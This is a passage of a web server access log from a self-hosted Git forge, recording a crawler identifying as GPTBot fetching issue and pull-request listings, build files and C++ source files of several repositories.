AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12029] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:18:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:18:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19135] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:18:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13537] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12805] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15371] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10106] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25230] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 1479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr 